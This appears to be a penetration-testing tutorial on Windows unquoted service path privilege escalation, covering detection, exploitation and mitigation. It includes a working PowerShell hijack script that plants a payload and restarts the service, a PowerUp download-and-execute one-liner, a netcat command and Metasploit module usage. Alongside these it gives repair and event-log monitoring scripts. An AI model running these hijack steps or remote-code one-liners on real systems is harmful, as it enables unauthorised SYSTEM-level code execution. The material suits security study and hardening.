# EoP - Unquoted Service Paths

## Unquoted Service Path Vulnerabilities: Identification and Exploitation

### Key Concepts

* **Service Path**: The location of the executable file that a service runs.
* **Unquoted Path**: A service path containing spaces but lacking quotation marks (e.g., `C:\Program Files\My Service\service.exe` instead of `"C:\Program Files\My Service\service.exe"`).
* **Privilege Escalation**: Gaining elevated access to protected resources.

***

### Identifying Unquoted Service Paths

#### **1. Using WMIC**

The **Windows Management Instrumentation Command-line (WMIC)** can list auto-start services whose path is not quoted. The first `findstr` keeps automatic services, the second drops Windows' own services under `C:\Windows\`, and the third drops paths that are already quoted. WMIC is deprecated and is not installed by default on recent Windows 11 builds, so on those hosts use the PowerShell method instead.

```cmd
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
```

#### **2. Using PowerShell**

The same check in PowerShell. The `-notmatch '^"'` clause excludes paths that are already quoted (a quoted path still contains spaces, so matching on a space alone gives false positives), and splitting at `.exe` ignores spaces that belong to the arguments rather than to the program path, such as `svchost.exe -k netsvcs`. On PowerShell 7 replace `Get-WmiObject -Class` with `Get-CimInstance -ClassName`:

```powershell
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.PathName -notmatch '^"' -and ($_.PathName -split '\.exe', 2)[0] -match ' ' } |
    Select-Object Name, DisplayName, StartName, PathName, StartMode
```

#### **3. Using PowerUp**

PowerUp, a PowerShell script from the PowerSploit project, identifies privilege escalation vectors, including unquoted paths. `Invoke-AllChecks` runs every check; replace the URL with wherever you host `PowerUp.ps1`:

```powershell
powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://xyz/PowerUp.ps1'); Invoke-AllChecks"
```

**Example Output:**

```plaintext
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path        : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName   : LocalSystem
AbuseFunction: Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
```

***

### Exploiting Unquoted Service Paths

#### **Manual Exploitation Steps**

1. **Identify the Vulnerable Service**:\
   Use the methods above and note the account the service runs as (`StartName`) and its `StartMode`.
2. **Choose the Hijack Path**:\
   Windows tries each prefix of the unquoted path that ends at a space, with `.exe` appended. For `C:\Program Files\My Service\service.exe` the candidates are `C:\Program.exe` and `C:\Program Files\My.exe`. Check which candidate directory you can write to (for example with `icacls`); `C:\` and `C:\Program Files` are admin-only on a default install, so the realistic target is usually a vendor directory with loose ACLs.
3. **Create a Malicious Executable**:\
   Generate a payload (e.g., a reverse shell) and copy it to the hijack path. Build it as a service executable, or have it spawn a child process and exit, because the Service Control Manager kills a process that does not register as a service within about 30 seconds. The legitimate executable stays untouched.
4. **Stop the Service**:\
   `sc stop` requires the stop right on that service, which standard users usually lack. If it fails, a service with `StartMode` `Auto` still runs the payload at the next reboot.

   ```cmd
   sc stop [SERVICE_NAME]
   ```
5. **Start the Service**:

   ```cmd
   sc start [SERVICE_NAME]
   ```
6. **Gain Access**:\
   When the service starts, the SCM resolves the unquoted path, finds your binary before the legitimate one, and runs it with the service's privileges.
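The manual procedure above as one script, added here as an example (it is not code from the original page or from PowerUp). It assumes you have already chosen a writable hijack path from the search-order candidates and built a payload (with `msfvenom -f exe-service`, for instance); the service name, hijack path and payload location in the usage call at the bottom are placeholders.

```powershell
# Added example, not code from the original page. Placeholders: the service name,
# hijack path and payload path passed in the usage call at the bottom.

function Invoke-UnquotedPathHijack {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$HijackPath,   # e.g. C:\Program Files\My.exe
        [Parameter(Mandatory)][string]$Payload       # executable you control, already on disk
    )

    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "Service '$ServiceName' not found" }

    # The SCM only tries $HijackPath if it is an unquoted prefix of the real path
    # that ends exactly where a space follows, e.g. "C:\Program Files\My" + " Service\...".
    $prefix = $HijackPath -replace '\.exe$', ''
    if (-not $svc.PathName -or $svc.PathName -match '^\s*"' -or
        -not $svc.PathName.StartsWith($prefix + ' ', [System.StringComparison]::OrdinalIgnoreCase)) {
        throw "'$HijackPath' is not on the CreateProcess search path of '$($svc.PathName)'"
    }

    # Drop the payload at the hijack path. The legitimate binary is never touched;
    # that is what distinguishes this from replacing a weakly permissioned binary.
    Copy-Item -LiteralPath $Payload -Destination $HijackPath -ErrorAction Stop
    Write-Host "Planted $HijackPath (service runs as $($svc.StartName))"

    # Restart. Stop/start needs SERVICE_STOP and SERVICE_START on this service,
    # which a standard user usually lacks; an Auto-start service then runs the
    # payload at the next boot instead.
    try {
        if ($svc.State -eq 'Running') {
            Stop-Service -Name $ServiceName -Force -ErrorAction Stop
        }
        Start-Service -Name $ServiceName -ErrorAction Stop
        Write-Host "Restarted $ServiceName; payload executed as $($svc.StartName)"
    } catch {
        Write-Warning "Could not restart ${ServiceName}: $($_.Exception.Message)"
        if ($svc.StartMode -eq 'Auto') {
            Write-Warning 'StartMode is Auto: the payload runs at the next reboot.'
        }
    }
}

# Placeholder usage. Remove the planted file afterwards:
#   Remove-Item 'C:\Program Files\My.exe'
Invoke-UnquotedPathHijack -ServiceName 'MyService' -HijackPath 'C:\Program Files\My.exe' -Payload 'C:\Users\Public\payload.exe'
```

The prefix check matters: a binary at `C:\Program Files\My.exe` is only reached if the real path continues with a space directly after `My`. The SCM also terminates a started process that does not call `StartServiceCtrlDispatcher` within its timeout (error 1053), so the payload must either be a service executable or launch its real work in a separate process before it is killed.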

***

#### **Example of Automatic Exploitation with PowerUp**

PowerUp's `Invoke-ServiceAbuse` targets services whose configuration the current user is allowed to change: it rewrites the service's binary path to the supplied command (by default it adds a local administrator account), restarts the service and restores the original path. It does not write to an unquoted-path hijack location; for that case the `AbuseFunction` line in the check output above points at `Write-ServiceBinary` with the chosen hijack path. To run a custom command through a modifiable service:

```powershell
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 1"
```

Replace `[SERVICE_NAME]` with the vulnerable service name and specify the payload command.

***

#### **Example of Exploitation Behavior**

For a service registered with the unquoted path:

```plaintext
C:\Program Files\My Service\service.exe
```

the Service Control Manager hands the string to `CreateProcess`, which cannot tell where the program name ends and the arguments begin. It treats each space as a possible boundary and tries, in order:

1. `C:\Program.exe` (with ` Files\My Service\service.exe` as its arguments)
2. `C:\Program Files\My.exe` (with ` Service\service.exe` as its arguments)
3. `C:\Program Files\My Service\service.exe`

The first candidate that exists is executed. If an attacker can create `C:\Program.exe` or `C:\Program Files\My.exe`, that binary runs under the service account (often `LocalSystem`). On a default install `C:\` and `C:\Program Files` are not writable by standard users, so the exploitable cases are usually vendor directories further down the path with weak ACLs; check each candidate directory with `icacls` before assuming the service is exploitable.
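The identification methods above and the search order just described, combined into one added example (this is not code from the original page or from PowerUp): enumerate unquoted service paths, expand each into the candidates `CreateProcess` tries, and test whether the current user can write to each candidate's directory. The writability probe creates and deletes an empty, randomly named file, which is an assumption of this example rather than something the page prescribes.

```powershell
# Added example, not code from the original page or from PowerUp.

function Test-UnquotedServicePath {
    param([string]$PathName)
    # Already quoted, or empty: not vulnerable.
    if (-not $PathName -or $PathName -match '^\s*"') { return $false }
    # Only a space inside the program path matters; spaces in the arguments that
    # follow the .exe (e.g. "svchost.exe -k netsvcs") are harmless.
    $program = ($PathName -split '\.exe', 2)[0]
    return ($program -match '\s')
}

function Get-HijackCandidate {
    param([Parameter(Mandatory)][string]$PathName)
    # CreateProcess treats every space as a possible end of the program name and
    # appends .exe, so C:\Program Files\My Service\service.exe yields
    # C:\Program.exe and C:\Program Files\My.exe before the real file.
    $program = ($PathName -split '\.exe', 2)[0]
    $index = $program.IndexOf(' ')
    while ($index -gt 0) {
        $program.Substring(0, $index) + '.exe'
        $index = $program.IndexOf(' ', $index + 1)
    }
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Directory)
    # Probe by creating and immediately deleting an empty, randomly named file
    # (an assumption of this example); Get-Acl alone does not resolve group
    # membership or deny rules reliably.
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path -Path $Directory -ChildPath ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePathHijack {
    # Get-CimInstance replaces the older Get-WmiObject and also works in PowerShell 7.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not (Test-UnquotedServicePath -PathName $svc.PathName)) { continue }
        foreach ($candidate in Get-HijackCandidate -PathName $svc.PathName) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                PathName  = $svc.PathName
                Candidate = $candidate
                Writable  = Test-DirectoryWritable -Directory (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

# Exploitable rows are those with Writable = True; RunsAs = LocalSystem and
# StartMode = Auto make them worth the most, since a reboot triggers the service
# even without stop/start rights on it.
Find-UnquotedServicePathHijack | Sort-Object Writable -Descending | Format-Table -AutoSize
```

Unlike the one-line checks, this reports the concrete path you would have to create for each service, so a service whose only candidates sit in admin-only directories shows up as unquoted but not exploitable.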

***

### Exploiting with Metasploit

Metasploit provides a local exploit module for unquoted service paths:

```bash
use exploit/windows/local/trusted_service_path
```

The module runs through an existing session on the target (`set SESSION <id>`). It enumerates services with unquoted paths, writes the payload to the first hijack location it can write to, and attempts to restart the service; if the session lacks the right to do so, an automatic service runs the payload at the next boot.

***

### Mitigation Strategies

#### **1. Quote Service Paths**

Always enclose service paths in quotes, particularly if they contain spaces:

```plaintext
"C:\Program Files\My Service\service.exe"
```
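The fix applied across a host, added here as an example (not code from the original page): wrap the executable portion of every unquoted service `ImagePath` in quotes, leaving any arguments after the `.exe` untouched. It needs administrator rights and supports `-WhatIf`, so the changes can be reviewed before anything is written.

```powershell
# Added example, not code from the original page. Requires an elevated shell.

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # Read the raw ImagePath (REG_EXPAND_SZ) rather than the expanded PathName
        # so that values written as %ProgramFiles%\... are preserved as such.
        $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        $image = (Get-ItemProperty -Path $key -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
        if (-not $image -or $image -match '^\s*"') { continue }

        # Split the program from its arguments at the first .exe.
        if (-not ($image -match '^(?<exe>.*?\.exe)(?<tail>.*)$')) { continue }
        $exe  = $Matches.exe
        $tail = $Matches.tail

        # Only a space inside the program path is a problem;
        # C:\Windows\system32\svchost.exe -k netsvcs is unquoted but safe.
        if ($exe -notmatch '\s') { continue }

        $fixed = '"{0}"{1}' -f $exe, $tail
        if ($PSCmdlet.ShouldProcess($svc.Name, "ImagePath: $image  ->  $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type ExpandString
            [pscustomobject]@{ Service = $svc.Name; Before = $image; After = $fixed }
        }
    }
}

# Dry run first, then apply:
Repair-UnquotedServicePath -WhatIf
# Repair-UnquotedServicePath | Format-Table -AutoSize
```

For a single service from an elevated command prompt the equivalent is `sc config <name> binPath= "\"C:\Program Files\My Service\service.exe\""` (the space after `binPath=` is mandatory, and the inner quotes are escaped so they reach the SCM). Either way the new value takes effect the next time the service starts.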

#### **2. Regular Audits**

Periodically audit service configurations to detect and remediate unquoted paths.

#### **3. Use Least Privilege**

Run services with the least privilege required, avoiding `LocalSystem` unless absolutely necessary.

#### **4. Implement Security Policies**

Adopt strict policies to manage service configurations.

#### **5. Monitoring and Alerts**

Set up monitoring to detect unauthorized changes to service paths or configurations.
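One way to catch a newly installed service with an unquoted path, added here as an example (not code from the original page): read Service Control Manager event 7045, which Windows writes to the System log whenever a service is installed, and apply the same unquoted-path test used for identification. The 30-day default window is an assumption of this example.

```powershell
# Added example, not code from the original page.

function Get-UnquotedServiceInstall {
    param([int]$Days = 30)   # default window is an assumption of this example

    $filter = @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7045
        StartTime    = (Get-Date).AddDays(-$Days)
    }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull the named EventData fields (ServiceName, ImagePath, AccountName,
        # StartType, ...) out of the event XML.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $image = $data['ImagePath']
        # Unquoted, with a space in the program part before the .exe.
        if ($image -and $image -notmatch '^\s*"' -and ($image -split '\.exe', 2)[0] -match '\s') {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Service   = $data['ServiceName']
                ImagePath = $image
                Account   = $data['AccountName']
                StartType = $data['StartType']
            }
        }
    }
}

Get-UnquotedServiceInstall -Days 90 | Format-Table -AutoSize
```

Event 7045 only covers installation. To see an existing service's path being changed, audit writes to `HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath`, either with object-access auditing (a SACL on the Services key) or with a Sysmon registry value-set rule (event 13) on that path, and alert on any new value that is unquoted or points outside the expected directory.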

***

### Additional Resources

* [**Microsoft Documentation on Windows Services**](https://learn.microsoft.com/en-us/windows/win32/services/overview-of-windows-service-applications)
* **OWASP Top 10 Security Risks**

